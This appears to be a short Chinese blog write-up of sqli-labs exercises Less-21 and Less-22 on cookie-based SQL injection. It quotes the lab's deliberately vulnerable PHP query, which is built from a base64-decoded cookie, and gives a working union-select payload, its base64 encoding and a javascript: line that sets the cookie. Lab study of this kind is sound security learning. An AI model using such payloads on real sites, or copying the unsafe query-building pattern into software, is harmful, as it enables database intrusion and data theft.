sql-lab:Less21-22(后续接着更新)

文章目录

Less-21

此题为SQL注入中的一种注入方式,为cookie注入,具体详解见如下链接
链接:https://blog.csdn.net/LSYZWF/article/details/117072765

Less-22

此题原理和Less-21一致,只是在构造拼接字段有所差异

题目提示为双引号的base64编码cookie注入
可以猜测后面的字段应该是用双引号括起来的
查看源码SQL语句:

$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";

注意第二行,在对cookie进行base64解码后的结果两边加上双引号

查询数据库
编码前:1" union select 1,database(),3#
base64编码后:MSIgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwzIw==

设置cookie
可以在地址栏直接设置:
javascript:alert(document.cookie=‘uname=’+escape(‘MSIgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwzIw==’))

重新打开网址,得到结果
sql-lab:Less21-22(后续接着更新)
查表和查字段也是一样,对需要拼接的语句base64编码后设置cookie即可。

上一篇:TCP/IP Attack Lab


下一篇:Spring03:装配